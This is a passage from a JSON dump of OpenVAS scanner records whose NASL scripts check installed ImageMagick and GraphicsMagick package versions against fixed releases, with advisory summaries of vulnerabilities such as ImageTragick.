rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5\", rpm:\"libMagick++-6_Q16-5~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-debuginfo\", rpm:\"libMagick++-6_Q16-5-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel\", rpm:\"libMagick++-devel~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2\", rpm:\"libMagickCore-6_Q16-2~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-debuginfo\", rpm:\"libMagickCore-6_Q16-2-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2\", rpm:\"libMagickWand-6_Q16-2~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-debuginfo\", rpm:\"libMagickWand-6_Q16-2-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick\", rpm:\"perl-PerlMagick~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick-debuginfo\", rpm:\"perl-PerlMagick-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel-32bit\", rpm:\"ImageMagick-devel-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-32bit\", rpm:\"libMagick++-6_Q16-5-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-debuginfo-32bit\", rpm:\"libMagick++-6_Q16-5-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel-32bit\", rpm:\"libMagick++-devel-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-32bit\", rpm:\"libMagickCore-6_Q16-2-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-2-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-32bit\", rpm:\"libMagickWand-6_Q16-2-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"libMagickWand-6_Q16-2-debuginfo-32bit\", rpm:\"libMagickWand-6_Q16-2-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:03", "description": "Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control over the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if ImageMagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full removal of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.", "cvss3": {}, "published": "2016-05-16T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3580-1 (imagemagick - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703580", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703580", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3580.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3580-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703580\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_name(\"Debian Security Advisory DSA 3580-1 (imagemagick - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-16 00:00:00 +0200 (Mon, 16 May 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3580.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"imagemagick on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these\nproblems have been fixed in version 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name:\"summary\", value:\"Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. 
These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-dbg:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-dbg:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libimage-magick-perl\", ver:\"8:6.8.9.9-5+deb8u2\", 
rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libimage-magick-q16-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", 
rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:26", "description": "This host is installed with GraphicsMagick\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-08-23T00:00:00", "type": "openvas", "title": "GraphicsMagick Multiple Vulnerabilities - Aug17 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-13148", "CVE-2017-13147", "CVE-2017-12936", "CVE-2017-13066", "CVE-2017-13065", "CVE-2017-11642", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-13064"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310112027", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310112027", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_graphicsmagick_mult_vuln_aug17_win.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# GraphicsMagick Multiple Vulnerabilities - Aug17 (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:graphicsmagick:graphicsmagick\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112027\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2017-11642\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13066\", \"CVE-2017-13147\", \"CVE-2017-13148\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-23 11:38:13 +0200 (Wed, 23 Aug 2017)\");\n script_name(\"GraphicsMagick Multiple 
Vulnerabilities - Aug17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GraphicsMagick\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"GraphicsMagick 1.3.26 and prior is prone to multiple vulnerabilities:\n\n - Allocation failure vulnerabilities.\n\n - Heap buffer overflow vulnerabilities.\n\n - Null pointer dereference vulnerabilities.\n\n - Memory leak vulnerabilities.\n\n - Invalid memory read vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause a denial of service via a crafted file.\");\n\n script_tag(name:\"affected\", value:\"GraphicsMagick version 1.3.26 and earlier on Windows\");\n\n script_tag(name:\"solution\", value:\"Updates are available, see the references for details.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/434/\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/436/\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/435/\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/430/\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/446/\");\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2017/08/05/graphicsmagick-invalid-memory-read-in-setimagecolorcallback-image-c/\");\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2017/08/05/graphicsmagick-use-after-free-in-readwmfimage-wmf-c/\");\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2017/08/05/graphicsmagick-heap-based-buffer-overflow-in-readsunimage-sun-c/\");\n\n script_category(ACT_GATHER_INFO);\n 
script_family(\"General\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_graphicsmagick_detect_win.nasl\");\n script_mandatory_keys(\"GraphicsMagick/Win/Installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!gmVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less_equal(version:gmVer, test_version:\"1.3.26\"))\n{\n report = report_fixed_ver(installed_version:gmVer, fixed_version:\"See Vendor\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for imagemagick USN-2990-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717", "CVE-2016-5118"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842781", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842781", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for imagemagick USN-2990-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842781\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-03 05:28:40 +0200 (Fri, 03 Jun 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \t\t\"CVE-2016-3718\", \"CVE-2016-5118\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for imagemagick USN-2990-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'imagemagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Nikolay Ermishkin and Stewie discovered\n that ImageMagick incorrectly sanitized untrusted input. A remote attacker could\n use these issues to execute arbitrary code. These issues are known as\n 'ImageTragick'. This update disables problematic coders via the\n /etc/ImageMagick-6/policy.xml configuration file. In certain environments the\n coders may need to be manually re-enabled after making sure that ImageMagick does\n not process untrusted input. (CVE-2016-3714, CVE-2016-3715, CVE-2016-3716,\n CVE-2016-3717, CVE-2016-3718)\n\n Bob Friesenhahn discovered that ImageMagick allowed injecting commands via\n an image file or filename. 
A remote attacker could use this issue to\n execute arbitrary code. (CVE-2016-5118)\");\n script_tag(name:\"affected\", value:\"imagemagick on Ubuntu 16.04 LTS,\n Ubuntu 15.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2990-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2990-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.7.7.10-6ubuntu3.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.7.7.10-6ubuntu3.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++5\", ver:\"8:6.7.7.10-6ubuntu3.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore5\", ver:\"8:6.7.7.10-6ubuntu3.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.6.9.7-5ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.6.9.7-5ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++4\", ver:\"8:6.6.9.7-5ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore4\", ver:\"8:6.6.9.7-5ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5v5\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"libmagick++-6.q16-5v5\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-05T18:44:42", "description": "The remote host is missing an update for the 'GraphicsMagick' package(s) announced via the FEDORA-2019-425a1aa7c9 advisory.", "cvss3": {}, "published": "2019-07-01T00:00:00", "type": "openvas", "title": "Fedora Update for GraphicsMagick FEDORA-2019-425a1aa7c9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-14997", "CVE-2017-13775", "CVE-2018-6799", "CVE-2017-17502", "CVE-2017-13737", "CVE-2017-11722", "CVE-2017-18220", "CVE-2017-12936", "CVE-2017-17498", "CVE-2017-13736", "CVE-2017-13648", "CVE-2017-11638", "CVE-2017-17503", "CVE-2019-11474", "CVE-2017-12805", "CVE-2017-14994", "CVE-2017-16547", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-18219", "CVE-2017-17500", "CVE-2017-14504", "CVE-2017-13065", "CVE-2017-12806", "CVE-2017-11642", "CVE-2017-14733", "CVE-2017-16545", "CVE-2019-11472", "CVE-2019-11470", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-14649", "CVE-2019-11473"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310876546", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876546", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; 